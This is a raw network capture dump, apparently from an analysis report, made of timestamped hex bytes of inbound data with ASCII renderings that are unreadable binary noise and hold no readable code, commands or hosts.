                                                                                                                                                2022-09-29 12:51:45 UTC24649INData Raw: 0f d0 95 e6 05 74 97 18 50 68 6d 18 d1 a6 9a 08 e6 02 93 0a ae 9e da 42 bd f9 6d 2d 38 6e 57 56 bf 48 73 40 d0 8b f4 aa 99 80 04 19 35 e6 54 28 8b 8d 02 81 66 91 6b ff b0 7b f3 13 aa ab 33 51 17 19 8b 07 9c 54 81 97 9e 5a 4d 43 f9 3f 31 9c 34 6e 0c 48 7e 13 9e ab ab ab 67 d2 8a 9e 52 64 5b 17 9b 53 4a a9 78 a9 12 80 e5 1e ca ae 5a 25 98 35 00 0d b2 93 e7 e1 41 f5 8e aa ad 20 27 73 b9 72 d3 94 c2 3e f3 d3 73 63 0b 56 fd 07 9b c2 76 4e 7f 40 aa c3 e7 b4 c5 fe 77 b4 96 20 43 22 64 ae de ee 9b ab e7 57 d2 4f 7e 5c 01 c1 86 25 d2 3e 00 af 24 63 de bd 95 f3 da be 43 21 48 c2 12 b1 fe b4 27 2d 00 18 25 8f 57 2a 3c a7 a7 c4 a9 68 82 e1 99 47 7d 3d c5 e1 bd 2f 94 1a ed ea 86 07 0f d7 0d 0a c2 6f 7f eb ee 77 32 c8 1c 8f f6 05 1d 68 c6 93 a6 58 73 5d 1a 3b 49 9a 57
                                                                                                                                                Data Ascii: tPhmBm-8nWVHs@5T(fk{3QTZMC?14nH~gRd[SJxZ%5A 'sr>scVvN@w C"dWO~\%>$cC!H'-%W*<hG}=/ow2hXs];IW
                                                                                                                                                2022-09-29 12:51:45 UTC24665INData Raw: e9 d6 f9 60 6c 5a 24 41 cd 9e 09 3a f9 36 0d 0c 1e d6 c6 1f 04 f6 da 0a 65 77 38 0f e2 4c 9b 90 f4 e5 3e 67 9a 3d d1 bc 44 32 28 df a5 9d 3c 82 f0 78 b0 e8 22 3a 92 e2 22 6a 26 2f 64 ea f9 29 5e b2 06 74 0a 32 77 2d 06 be 04 c1 cf 8e 20 d4 fc 75 62 24 07 e4 85 05 c0 c6 1e c2 7d 13 6b bb 54 b3 dd 99 d7 07 37 02 9f d7 3c cb ef 40 58 86 ad 88 3d 14 24 6a 6a ed 7d 6d 65 a3 e3 69 8f 5f fd 18 29 23 c5 2d 40 47 b2 92 c9 79 fb 9c e4 73 43 9b ac ed 1a 53 42 62 d5 36 23 41 6c 60 f9 42 f7 ed 06 18 a5 28 b8 c2 8f d5 44 17 cb a1 06 c1 9e 98 fc 85 65 4b bc 53 df 3a 03 62 5f 6c af 21 2f bb 70 62 28 54 1f fd 1e d2 79 1d 25 43 ce 51 9e cb 3f 8a 80 32 bd b8 3a ff 6b 0e 92 71 16 54 68 85 26 50 4e b1 02 c9 e7 8c 6f 56 a8 93 73 d0 e3 bb 4d ac 61 d9 18 df 4b 68 ee e5 74 a6 2e
                                                                                                                                                Data Ascii: `lZ$A:6ew8L>g=D2(<x":"j&/d)^t2w- ub$}kT7<@X=$jj}mei_)#-@GysCSBb6#Al`B(DeKS:b_l!/pb(Ty%CQ?2:kqTh&PNoVsMaKht.
                                                                                                                                                2022-09-29 12:51:45 UTC24681INData Raw: 9f dd cd bd 77 57 d5 33 f2 fc e7 6f 1b 9e 90 c4 82 db 8d fb bd d8 01 a0 2d 56 24 9c b7 8d eb fe 83 56 c2 15 cd e5 49 01 6d 94 65 e8 cb 4b 5c 70 d4 fa 44 79 80 6b c4 d3 41 64 be 25 94 88 a6 0c 51 c5 1e 19 a6 9e 31 f0 79 bb 02 8f 23 77 a9 37 53 0a 5e 0f b3 7b df 41 b0 69 27 d5 c0 3c f6 70 5a 88 3c 2c 4d 00 5a 9d 5e b4 b0 ca 8e 3c 6c 8a 28 9c 6d 22 b6 6e 7d 0e 91 e3 13 6e 2c 00 78 ca 51 43 da 16 90 8b 60 06 03 d8 d7 2d 80 d7 d7 0a c7 14 1d 8a d7 e7 9b d7 79 9b 3e 8d 7d 71 63 64 71 15 85 c7 ec 9d 90 6b ae 4e f3 27 59 4b e3 52 c3 b3 44 b9 43 08 a5 4d 23 a8 50 a2 25 ef b9 e9 8a ab b1 9b e5 41 6b 1b 0a 3f 5b 4f 96 84 82 c0 94 cd 0a ca 2b 8b 8a 21 04 81 39 37 3b 7f 42 1a 99 38 d0 17 69 db 00 d8 a6 06 63 8f c2 e4 4b 76 4d 00 b2 41 37 8c 91 f2 3a 91 dc 01 cf 3e b8
                                                                                                                                                Data Ascii: wW3o-V$VImeK\pDykAd%Q1y#w7S^{Ai'<pZ<,MZ^<l(m"n}n,xQC`-y>}qcdqkN'YKRDCM#P%Ak?[O+!97;B8icKvMA7:>
                                                                                                                                                2022-09-29 12:51:45 UTC24697INData Raw: ee 61 9f 95 27 46 d6 ef 8a 6c f4 87 7a 3d 93 ab 0b 54 1b d6 ee b6 f0 47 06 fb 35 5f 6c a8 5a 68 cd 3a a5 56 bd 88 17 4a 16 8e 61 9a 93 12 1b 2a e0 bf c1 b8 cd 76 cd 5b 1a b6 12 2e 50 68 bd c5 90 ef 29 18 dc 0f 16 8e 3e 52 90 5b 78 44 b0 f3 bc a3 ba 2f 74 0f 03 47 d0 41 ce 75 f8 59 3c a7 99 f2 0b b9 d9 61 eb 08 2b 90 7f 5a 2c 22 31 9f 60 7c 89 96 43 d8 05 ec c9 34 a0 2d 05 e1 80 d7 a5 26 b2 8d 72 30 9a 25 1f d2 9b 48 22 4d c3 a2 b3 b5 68 fe 5c f1 7d 77 34 30 de 74 d5 32 77 52 2c d7 a9 a2 b5 c5 64 15 f3 6a f6 72 b0 ca fc 85 24 94 01 ee 21 93 3a d2 02 b2 a5 cb bd 8f 23 ce 3e e2 f1 ea d8 97 7d c7 1f 8e 4b d7 67 09 65 e5 50 5d fe dc b3 da a7 3d e2 58 eb c3 9b f5 77 e2 68 64 c8 63 1e 72 23 d5 4d 7d f2 6c 6d 2d 51 bc 71 c9 89 de cc ae 0d 08 ca 33 29 d5 d2 04 51
                                                                                                                                                Data Ascii: a'Flz=TG5_lZh:VJa*v[.Ph)>R[xD/tGAuY<a+Z,"1`|C4-&r0%H"Mh\}w40t2wR,djr$!:#>}KgeP]=Xwhdcr#M}lm-Qq3)Q
                                                                                                                                                2022-09-29 12:51:45 UTC24713INData Raw: 36 f5 01 e7 9d 42 71 e6 b9 df c4 04 14 40 9f f4 ec 13 9e 2e 33 0a a9 91 5e 37 ef 52 8b 0e cc 27 6c 68 59 2b 98 05 2e cb 0f eb bf 81 ae 59 b6 be e9 51 35 f0 9d 3e b6 16 3f ea 65 ee 70 85 96 89 9c 0e e2 63 66 d0 01 d6 99 8d ca 4c 89 e7 c5 8d cc 27 e3 91 b9 e9 88 d7 13 f2 28 55 ed 20 e2 8a f7 ef 6e b2 89 7d e2 1f c0 6d ca 92 ff e9 e8 bc de 17 e3 6c 23 8e 76 43 38 1d 31 8d 68 d6 df c5 bc 97 ff ce 02 b1 95 4f 17 77 bd 88 78 e7 7f 1d 9b 28 f5 05 b8 ad 96 bd 7e de aa d6 29 02 95 43 81 19 60 6e d5 56 f1 59 72 d5 fa 3b 27 de 11 fa 66 d0 53 31 52 eb 08 0e 43 dc ac 1b d6 e1 b8 9b 2b b7 28 87 16 ed cc e8 f7 f4 30 f4 a2 f8 6e 6f a3 3f 7a 4b a8 ba 19 e2 0c e6 68 ce 31 4b 24 f9 b9 34 d8 67 5e bc 0c 55 a8 5d b2 a0 50 d3 77 3d 71 6b d0 01 52 0e c8 fc dd e3 aa 0b 13 c5 76
                                                                                                                                                Data Ascii: 6Bq@.3^7R'lhY+.YQ5>?epcfL'(U n}ml#vC81hOwx(~)C`nVYr;'fS1RC+(0no?zKh1K$4g^U]Pw=qkRv
                                                                                                                                                2022-09-29 12:51:45 UTC24729INData Raw: 80 18 d2 02 6f a3 29 19 6b 44 c6 d9 c4 28 5d c1 87 3f 9d 20 79 0f d8 a1 7b 5a e4 c6 4b 79 27 4d c6 a0 22 c7 57 eb e2 22 3f e5 49 2a 95 25 2a 9e 7b 74 c9 50 14 3a 35 ff 30 5c 02 32 58 93 78 cc a7 8d 7e 11 47 72 23 d3 2f c9 90 9b b6 1d a9 6d 61 21 8a 2d e6 1c 02 13 49 cb 13 2f b1 cd 94 32 a2 33 49 cc 28 80 f0 59 9b 13 7a e1 61 91 c4 7c af 01 88 d7 e7 07 1a ac bf 0a 0e 67 f5 e4 2d 66 06 78 d5 b5 43 ac b0 c2 14 fe 5f 04 2c 8b 2d fe 5b f5 e5 d7 67 7a 54 ee 6b 26 e0 04 f9 fc 54 4e 5a 70 19 05 ac c1 02 94 9d d2 b2 b5 d6 f7 d8 9e 70 44 7f ea 33 b8 e7 7f 5b 9b a0 c7 5e 2f c7 cf e0 51 9c fe 43 39 c2 75 83 0e 3c db 84 65 3e cd 2c 78 3b fe 75 28 10 2b e9 24 30 bf b8 c1 b3 2e e8 d5 24 cf c1 2b fe ef 8b d0 c2 97 69 cb 9e ab 33 e2 a7 8b 15 af d6 37 11 f9 8c c2 e2 6c e1
                                                                                                                                                Data Ascii: o)kD(]? y{ZKy'M"W"?I*%*{tP:50\2Xx~Gr#/ma!-I/23I(Yza|g-fxC_,-[gzTk&TNZppD3[^/QC9u<e>,x;u(+$0.$+i37l
                                                                                                                                                2022-09-29 12:51:45 UTC24745INData Raw: 01 98 bf bd 38 66 e6 6e 2a d3 f1 23 62 54 05 0b ac 21 de 6e b3 db f8 97 06 0b 78 b2 8d b0 c4 22 ee d0 99 5e af e6 91 b7 64 0b 45 35 ac d1 d3 7d c0 b3 16 48 5a ca d2 87 33 4f a1 28 54 e0 10 bd 16 40 98 c4 5a 33 12 8d ea 9b d1 c8 31 bd af 6c e5 87 7e 53 77 99 55 58 87 ab f6 43 d1 d0 68 52 57 05 07 ec e7 f0 a8 0a 42 87 ab 38 bb 54 e6 a6 dd 5f 0c 22 9c b1 51 04 17 37 0b 5a a0 93 5a 63 69 10 ff 78 88 2b 89 50 65 fc e0 90 03 bb fe 99 fe 92 0c 17 1f 6d dd 10 e8 48 39 58 ac 75 ca b4 f5 61 82 12 55 15 f2 59 f1 da cb e0 f4 e7 58 a3 a2 52 93 89 fa 7a f4 fb df ba 9f d8 cb db b1 88 aa bb 3c 54 04 43 9a 8b 73 a0 44 b1 ae 14 98 77 33 31 0f d9 5b 58 60 36 79 40 35 73 4d 7f f5 21 18 7c 87 0c 9c ce b3 cc c7 14 84 78 e3 28 4b ab 54 85 78 07 87 99 95 a9 78 07 25 f6 4e ad a3
                                                                                                                                                Data Ascii: 8fn*#bT!nx"^dE5}HZ3O(T@Z31l~SwUXChRWB8T_"Q7ZZcix+PemH9XuaUYXRz<TCsDw31[X`6y@5sM!|x(KTxx%N
                                                                                                                                                2022-09-29 12:51:45 UTC24761INData Raw: 9c c0 2d dc 42 8c 1e 3f 92 7c 20 5f 52 a7 2e 8d d5 a8 ec bb e4 34 cf b4 2d a5 d9 07 2f fa a7 cc 44 86 b7 69 fb 92 a6 bb 4b c6 16 86 ae 12 69 27 69 2e 11 03 28 53 37 16 bf b6 66 ad b8 3a 4a 92 24 33 5f 09 1f 9f 84 c8 56 17 9e 76 7b 4e 3d cc 84 5d 3e 68 90 5c be c6 84 f5 e6 e7 b4 95 b5 e2 f8 c8 ab 5c 63 31 65 48 d8 4d 50 3a 5a 49 72 00 d4 b2 c0 34 a8 d1 f5 97 9d 43 4e 91 f5 60 69 48 39 d4 3d ea 55 fa 49 76 f0 b8 64 4d 6a 07 c9 35 ba 6b 4b 08 69 fe bc 1a 9e 93 dd e8 f6 aa 4f ef 29 c0 b0 61 31 7f e4 95 10 f4 b2 27 1e 8f 6b e2 43 0d 8d 5b 44 e3 00 01 14 e2 4c a0 b3 b5 0d e9 9f 5c 27 98 12 cf 91 15 3a d8 ae 98 d5 38 82 c2 46 7c bc 5f be 1c 18 b7 bd a3 bb 22 04 68 ac 1a 40 de e3 b1 5a 6c 2f 41 50 cd 74 c2 88 16 c3 cd 82 5b 29 c2 b5 c4 3e 57 f1 6b 28 cc 0d 71 1d
                                                                                                                                                Data Ascii: -B?| _R.4-/DiKi'i.(S7f:J$3_Vv{N=]>h\\c1eHMP:ZIr4CN`iH9=UIvdMj5kKiO)a1'kC[DL\':8F|_"h@Zl/APt[)>Wk(q
                                                                                                                                                2022-09-29 12:51:45 UTC24777INData Raw: d8 f4 c4 bc eb f8 9e 34 12 c8 40 fc ee 0a 28 46 5f 41 b5 17 bc 11 3c 4e f1 dd ee 91 e8 e1 52 81 80 87 5b 32 7d 9d 60 cb 32 a5 1d cd d3 7a ce 29 25 32 06 88 7c c7 4a f3 d6 5f 48 58 5a ee b8 b7 2c 32 52 c2 e9 66 bc df f9 50 b9 f2 84 4e 92 a0 b4 5b 46 ea 5e 68 b9 08 57 d8 5e 26 a5 0b af a6 f0 3e 81 ca 85 52 a1 bb 2f 94 2f 5b c7 87 2f 8c 87 ca 52 59 f1 15 75 a5 3a 3a bf 8d 05 d5 94 4d 2d b6 35 b4 dc 61 00 02 01 43 c2 9d 6b 9e ca b4 72 4c 2a 0e bb 6d 2c 6d 1a 9c b3 ba 02 98 cb 00 7a 80 40 dc 6f df 92 06 09 0a 8d f0 ee e6 e9 60 31 b7 73 8d 98 4b 99 48 bf 66 40 55 12 e0 3a a2 62 49 7d 0a cc 93 fd 23 92 ad 44 9d 37 d7 b5 1a 8b 01 b7 96 84 e2 06 8b 48 92 6a 36 fe 8c 9c ae d4 03 e0 68 bf 6f 71 39 f8 84 e7 ae 87 9a df 00 fc cb 8f 34 e9 f1 34 5b 33 98 e1 93 65 47 82
                                                                                                                                                Data Ascii: 4@(F_A<NR[2}`2z)%2|J_HXZ,2RfPN[F^hW^&>R//[/RYu::M-5aCkrL*m,mz@o`1sKHf@U:bI}#D7Hj6hoq944[3eG
                                                                                                                                                2022-09-29 12:51:45 UTC24793INData Raw: 4c 14 01 4a 7e 31 2c c2 90 ef 4d 4d 05 d9 8b 81 77 8b 37 83 22 33 9c 8c 96 19 ed 31 98 d9 a0 e6 a4 a6 cd 9b 3b 87 0c ce 2e ce 6c 86 cf b0 5d eb b5 a1 bc 75 f0 98 04 d8 ae 40 4b 19 53 33 81 74 99 80 b1 b7 32 6e a2 73 5c a2 7d cb 05 32 1a 52 dd 86 d7 5f c7 83 08 57 c5 04 a9 ae c1 51 38 de 78 13 37 6e 38 63 2e 58 13 16 70 fa 47 f3 55 b2 fe ad 1f 01 57 d9 65 53 5b d4 72 15 ab e5 42 11 14 ec eb e4 ad ec 4f b9 75 cc d4 17 b9 d4 5c 5e 18 84 13 19 80 5d 7e 42 82 59 9a c7 6f 1e 86 16 da 7a 5a 44 1b 25 b9 bc cf ae 61 d2 98 aa 61 21 5d 12 d3 28 d1 32 70 b6 aa 4f df 6b d5 a0 97 ba c2 b0 41 a1 63 0d 87 4a fb c8 9f 81 24 e2 a5 30 9f d6 d5 a9 87 9a f2 12 54 4d cd 28 10 5e 1f 63 95 f0 06 f1 6d e5 43 24 2a 3b aa 6c 2d 76 d4 ce 89 82 c9 a7 ba 49 7f 94 50 73 60 ff 11 2a 43
                                                                                                                                                Data Ascii: LJ~1,MMw7"31;.l]u@KS3t2ns\}2R_WQ8x7n8c.XpGUWeS[rBOu\^]~BYozZD%aa!](2pOkAcJ$0TM(^cmC$*;l-vIPs`*C
                                                                                                                                                2022-09-29 12:51:45 UTC24809INData Raw: f0 82 6b af 17 f9 f8 d1 8b 6c a5 21 24 5b ff 4e c6 4c 06 34 ab f6 d5 b1 85 42 54 74 83 5a e9 6f a9 ae 1a 4e 34 08 a9 17 d0 31 8a 3b 68 83 2a cb 3b 4b db ab 84 5a 94 ea 9a 5d d2 de 69 a5 c8 03 4c 5d fb a0 76 bb f9 5b ab 8a af 0a d3 43 c7 64 85 01 cb 36 aa 7d 18 18 9a fb 08 02 df 5a e3 64 5d 2b 30 15 0a 65 9c 40 92 02 c3 eb b0 3f 97 16 65 52 c0 b9 6c e2 7f 1d 49 27 ec 55 73 0b f8 e5 8c 6b 01 79 e3 84 eb 34 41 97 4e 42 c0 27 c2 f9 82 34 9a 76 35 f2 c5 c0 45 40 50 63 bb b8 db 54 b1 1a e4 6d de 7b 19 0d 96 f9 84 24 a4 2f 8c d7 36 7d 2f 47 1e 54 8b b9 d2 95 1a 23 8b d0 6b d2 4f 10 c8 08 56 87 a1 c6 da d6 e2 02 45 0e fd 9f c9 f4 79 24 d5 77 0b 27 8d 21 af 24 08 77 25 a3 53 89 e0 03 0a 4a 5b 51 dd 43 aa 3f 33 05 f2 95 3e 7e 41 53 86 9c 7b 1c 5f 9b a1 0f ad 79 7c
                                                                                                                                                Data Ascii: kl!$[NL4BTtZoN41;h*;KZ]iL]v[Cd6}Zd]+0e@?eRlI'Usky4ANB'4v5E@PcTm{$/6}/GT#kOVEy$w'!$w%SJ[QC?3>~AS{_y|
                                                                                                                                                2022-09-29 12:51:45 UTC24825INData Raw: 4b 41 10 69 28 96 62 b1 b4 f1 cc 8d 08 17 28 2a 18 b5 d9 c5 bc 52 c3 3e e5 0b 9d 92 39 a8 7c 70 55 f3 04 35 2c 0d 91 fe c4 3a 0d bf 75 f2 a9 19 d4 22 59 39 2f 50 4c c1 38 33 93 63 23 ac bb 6d 48 a4 08 1b 5b 0e ec a7 bb fb 1f 46 3d fc c7 f7 c2 ae d8 e7 f2 e7 ab ce 13 1b 14 0d cb 3e 36 52 32 4d b2 64 17 78 7e 44 a7 1b b7 35 7d dc ee 89 74 e0 10 5f 4f 80 17 2f 44 5c 87 7c 5d c9 8c 9b ff 4a 50 06 85 ee 7e 5e 16 0e 03 85 5b 97 4f 1b a6 b2 85 3d 75 12 88 37 af 84 ec 64 b8 1c 9e f4 4d be fd ab b2 42 b3 6c 75 88 26 06 36 f8 89 d1 6c ac 15 82 a3 4c fc 74 c3 4c 39 41 d1 94 17 00 da 62 25 92 8a 70 32 c9 f4 fb 1a 33 ae fd ae 1c 76 67 21 1d f1 16 ea 01 43 9c bf 43 78 05 01 56 4c 3f 63 01 2d 86 c2 d5 b1 53 c3 39 56 3b 8a f3 f8 a0 81 20 87 e8 02 19 e8 04 8f 7f 7f 8d 59
                                                                                                                                                Data Ascii: KAi(b(*R>9|pU5,:u"Y9/PL83c#mH[F=>6R2Mdx~D5}t_O/D\|]JP~^[O=u7dMBlu&6lLtL9Ab%p23vg!CCxVL?c-S9V; Y
                                                                                                                                                2022-09-29 12:51:45 UTC24841INData Raw: dc 80 50 18 98 ea 2e f8 7f 20 35 04 3a 42 7d 2e 6d 79 a8 f5 3c d2 d5 78 7c 77 05 06 6e 16 f3 9d 54 ac e0 c2 fa b0 5b c0 25 87 b4 17 a6 ef d5 73 9c 6f 6f 29 22 78 df 24 a8 99 43 22 91 a9 66 ed ff 0f 18 1c 3a fe 24 3d 90 02 30 65 82 f6 be 6a 7c a5 a9 1f 01 83 59 ee a2 6b 67 0e 5d 83 b2 7e 3f 54 a7 cc 9f 7a 8b 29 9e 27 96 9f 54 f0 39 33 a8 3e 9a 59 f3 34 fd 64 cb 48 63 84 4b 83 32 e4 e2 6a a4 b1 ca ac 96 36 3a e1 9d ab b9 e7 a1 02 54 6a a1 b5 d1 2f 09 46 66 bd d7 e2 9e 59 33 59 cf e5 4d 2c 70 81 df d0 28 fc 03 93 64 99 6b 88 e3 30 69 2c 7e 59 ee eb c7 f6 fc 09 97 13 8b cd 0f c7 ff a0 8b 46 7b 2f 99 ef f7 cb 61 ed 2f 42 db 25 27 bc 36 18 73 62 f7 90 58 f4 8c 6c 6c 01 8e a8 0d c7 c3 6a d0 d6 8d 97 61 e0 55 ba f4 51 6f 9a c3 ea 37 8d 0b 97 04 a6 14 10 4c 66 3b
                                                                                                                                                Data Ascii: P. 5:B}.my<x|wnT[%soo)"x$C"f:$=0ej|Ykg]~?Tz)'T93>Y4dHcK2j6:Tj/FfY3YM,p(dk0i,~YF{/a/B%'6sbXlljaUQo7Lf;
                                                                                                                                                2022-09-29 12:51:45 UTC24857INData Raw: 25 91 82 81 bf 46 77 ba ce f4 72 3f 6e 68 70 01 8f 5f 94 8c 3a bb e4 42 70 5a a0 b3 78 a0 c4 00 a6 3a fe 57 83 41 a9 61 a9 18 97 b3 03 af 9e 23 0d 84 ee b1 2a 05 e5 c2 0a b7 ae e2 e7 11 b7 d7 45 77 80 f9 d0 4c 7b ec b2 4f c0 fc 15 c3 39 e5 57 fc 09 1c 51 d2 d1 f3 3c ca d0 8c 1a bb 06 6e a5 92 c4 46 ad c5 1b 7d 3f eb 48 56 d5 35 eb 34 6d 47 21 10 74 dc b4 ef fe a1 df f1 63 8a 17 47 a8 fc cf a3 70 47 d3 36 c6 8d 80 b2 e5 1d 23 81 5d 41 6c 1e e6 65 01 ab 72 0c 0b 90 c0 ad 0c ef b8 d6 c6 b3 0f ff a1 6c 37 2f 78 8b fe 7b da c4 b2 7f 6e 76 70 5d a3 f0 cc 4f cd df f8 31 ec d6 bf 05 4e f9 d5 24 48 1a c7 7e dd 2a 4c cb 07 79 91 96 01 4a 74 43 12 6a b6 05 ae a8 77 81 51 01 ca 57 41 5e c2 ad f1 d1 b3 15 56 3b d6 97 91 9d 47 ee fe c0 fb a4 e7 0d 18 d2 ad 64 60 38 21
                                                                                                                                                Data Ascii: %Fwr?nhp_:BpZx:WAa#*EwL{O9WQ<nF}?HV54mG!tcGpG6#]Alerl7/x{nvp]O1N$H~*LyJtCjwQWA^V;Gd`8!
                                                                                                                                                2022-09-29 12:51:45 UTC24873INData Raw: 17 0e e0 0c 12 7a d6 8e 33 ec 3c 9d 0c a8 b6 c1 8f 82 d1 00 c2 eb 0f f1 cc 6e 8d 16 0b cc 2a 8f 37 5b 1d a7 2a 25 55 a8 67 33 af 56 7c 78 9e 22 bb 55 30 d7 78 4e 45 74 32 bf bf af ba 9c 0b f7 0e e5 33 35 10 4e 2c 2a 5d 34 8f ce 0e f6 38 2c bf 02 8c bb b2 01 35 6b 6a e7 b8 34 03 49 6b 8c 65 71 1d fd 87 93 17 04 8e fc 3d da 78 36 50 c9 90 38 ae 82 98 41 6f ab 43 03 9f 4a 2e 2e c0 04 ea 13 78 33 34 72 2f 90 38 ad 72 aa b6 f3 b8 7d a9 4a ad 98 66 93 bf e6 13 ed a7 39 71 6f 9e dd 06 79 ae 92 cf 44 55 b9 89 a0 7f 2d 1b 6f df c0 da 27 76 9c be b1 24 9c ba 2e 85 f7 c7 bc bc 64 f2 c8 28 f3 02 c2 fa 7a 1c db 6c be 7b 87 74 89 2a c7 74 a0 bc a9 c4 79 57 08 24 db 02 01 fc 0d e5 ee 0e af 68 b9 7b f5 33 8f 23 a8 82 c6 50 a3 79 3e 40 81 4b a5 f8 24 7c b0 6e da 1a 80 d3
                                                                                                                                                Data Ascii: z3<n*7[*%Ug3V|x"U0xNEt235N,*]48,5kj4Ikeq=x6P8AoCJ..x34r/8r}Jf9qoyDU-o'v$.d(zl{t*tyW$h{3#Py>@K$|n
                                                                                                                                                2022-09-29 12:51:45 UTC24889INData Raw: 32 82 40 07 05 56 60 1b 0c ce a9 20 82 24 eb cd 1d dd a5 c0 1d 58 bc b4 0d cb 1e 10 2a 04 45 e0 4c 41 9f 12 27 e6 1a 5f 79 53 fe 81 74 de ed 62 83 7e 7d 0e 0d b8 01 c9 5c e9 69 e3 63 b0 6d 4f 04 0b 13 83 51 b8 b5 14 5d 0e 96 fa ce 6a 40 fd 20 a3 8c 61 1d ac 27 3a 80 ad 88 27 7d 2e 2d 0f 39 ea da 0f a9 bc d4 63 46 17 4a 96 a5 bc 9c 97 e4 5d be 42 cf 5c 82 48 e3 4a 9c 33 3d d3 56 9b 53 17 ed 02 87 be 2f 64 9a 0c 42 55 ee d5 37 6c e3 2e 63 e4 f1 9f ee 04 26 6d 9c df 00 12 7f f2 70 74 6a f3 6d bf ec 4d e0 6a df 8a 7b 48 bc 89 f6 1b d8 6f e7 57 06 1c 17 da ec 3e 14 f3 ff a8 a0 26 f1 a9 9a 43 ed 62 dc bf f4 8d 20 97 87 5a 33 be e6 d8 9a 75 b8 6c 9a 8b 5a e2 29 44 19 1c 93 12 41 2f 73 57 05 4b 8d b0 cb 5a ef ef 1b 47 7d 8e 93 0e 47 da c6 4b e7 7c a1 59 73 b3 0a
                                                                                                                                                Data Ascii: 2@V` $X*ELA'_yStb~}\icmOQ]j@ a':'}.-9cFJ]B\HJ3=VS/dBU7l.c&mptjmMj{HoW>&Cb Z3ulZ)DA/sWKZG}GK|Ys
                                                                                                                                                2022-09-29 12:51:45 UTC24905INData Raw: 6e 1a 7d ba 8c b5 c6 0e 60 3b a2 c0 36 1f 5b f1 b0 c7 57 6b df 8d 5f 10 f7 8f 91 6e fc a3 b0 83 09 c8 f5 eb 07 97 57 4a 0d cf fa 9f f4 f5 18 7b 2c 6d cf 17 65 77 8a 63 b3 01 b9 bc 33 08 a8 81 c7 ac f9 6b 2d f4 7d 42 de ff ac ea 38 f8 cb 50 a9 4b 89 e4 53 3d a9 97 6f 13 26 6e 1b be 64 9a fd f6 cd 25 9f 7e b1 10 ca f0 54 17 eb 17 52 71 73 91 ae d7 6d f9 54 53 14 2d 95 48 c6 66 12 72 7e e8 77 6c 6d 6e a8 37 4b be 01 e8 13 27 0f 8b f0 db ab 39 01 f4 ab 7c 96 05 24 97 72 a2 6c a9 19 f4 11 77 20 0e 58 5a 99 bb 47 61 6c 6d 39 0c ce ee 3b 00 58 41 65 7f d9 af 90 b9 13 51 14 59 0b 35 82 26 70 e6 aa 9e 1d 5d ac 2b be 03 8b 71 60 8a 56 7d c2 8a 16 c2 23 c6 92 74 a7 aa 52 11 4d 53 71 07 49 76 7a f2 b9 de 9a d6 1d 89 8b 74 8c 66 57 50 f4 b7 ad 98 10 7c f2 52 ab 17 a0
                                                                                                                                                Data Ascii: n}`;6[Wk_nWJ{,mewc3k-}B8PKS=o&nd%~TRqsmTS-Hfr~wlmn7K'9|$rlw XZGalm9;XAeQY5&p]+q`V}#tRMSqIvztfWP|R
                                                                                                                                                2022-09-29 12:51:45 UTC24921INData Raw: 8a 21 09 c4 b6 93 f2 a2 89 00 72 6e 86 a9 37 00 09 95 f1 15 1f d5 c1 a3 dd 1a a9 52 72 1f 57 4c cc 8c 82 06 15 e8 b2 e5 2d bd ac 3f e6 d8 99 02 1d d2 aa ee 46 2c f9 0a a6 3a a9 28 15 15 3d 46 3b fb 47 ee 27 4d f0 f9 94 28 87 8f 04 40 c0 eb c7 97 4b 35 47 08 96 3a 19 47 5b d8 be 33 98 70 b2 e1 b2 06 ad 94 e3 9b 0a 62 39 2d e4 f3 b6 6f aa f7 28 4b 4b ed c1 5e 25 fa 00 26 7f 21 17 a3 a2 fe e3 08 6f f2 a8 02 e2 77 b5 55 52 73 4d 80 7b 3f 0b 06 0b 14 cf 9d a4 83 7a c7 62 b7 89 05 94 9d 04 8c db 4d 5d 6e ac fe 29 c7 60 a2 f1 a3 cf f4 91 6a 1b ff 3e b5 88 1f 95 27 9e ca 82 f3 c1 5a c9 6b 2b aa 24 c3 10 c3 f8 e8 6d 6b 8e 43 e9 3f 07 4c 1f 7e 84 53 af 96 93 64 d3 78 98 41 ab 46 aa fe 0c 46 29 f7 3b 29 9b 19 5a 4b 08 73 1e 11 57 0f 67 2e fa 7f 97 46 0d 09 77 1e 29
                                                                                                                                                Data Ascii: !rn7RrWL-?F,:(=F;G'M(@K5G:G[3pb9-o(KK^%&!owURsM{?zbM]n)`j>'Zk+$mkC?L~SdxAFF);)ZKsWg.Fw)
                                                                                                                                                2022-09-29 12:51:45 UTC24937INData Raw: a1 fc f5 21 52 d1 70 c4 90 21 b4 35 ae f8 a0 2d 4e 8d d8 72 9b 22 49 08 9a 54 75 8f ef 8a 8c 68 c7 9f 3f 4b fa 98 70 e0 16 31 3e 18 11 20 a7 ca 6e d5 f8 94 37 e0 15 ed 47 2f f2 b5 58 86 06 ce 49 f0 2a 69 b0 bb f2 9b 1b 66 d6 44 92 b0 01 cd cc 02 6f ad a8 9d 3b 29 39 ff 53 00 93 81 71 20 65 65 d2 97 44 32 73 f7 16 f6 0e 2f 0d 2f ae 19 0a ef 4c f1 1e 9b 90 5f dd 9c fc 45 63 19 f5 f5 3a 46 0f 5b 28 3c a2 16 ba bc e8 92 85 1f 13 02 a3 39 98 35 70 c6 9a 26 b3 99 8d 72 f7 a9 99 32 a7 58 e6 64 4f 02 9e 64 59 18 60 69 fb 72 31 c6 24 b1 61 5b 01 f2 41 4f f6 d9 4e 35 16 a6 8f a4 27 fc 2e fe 66 06 73 75 9d e7 a0 ac 39 78 b9 47 63 2f 81 b7 63 42 45 d8 4e 4c 07 b2 ac f1 d7 4d 24 4e 0f c0 31 ad 85 80 e5 6e 4a 89 45 d4 00 7b cc 0b 15 5f 1f 10 a1 1c 8f 2c b4 3f 87 25 6f
                                                                                                                                                Data Ascii: !Rp!5-Nr"ITuh?Kp1> n7G/XI*ifDo;)9Sq eeD2s//L_Ec:F[(<95p&r2XdOdY`ir1$a[AON5'.fsu9xGc/cBENLM$N1nJE{_,?%o
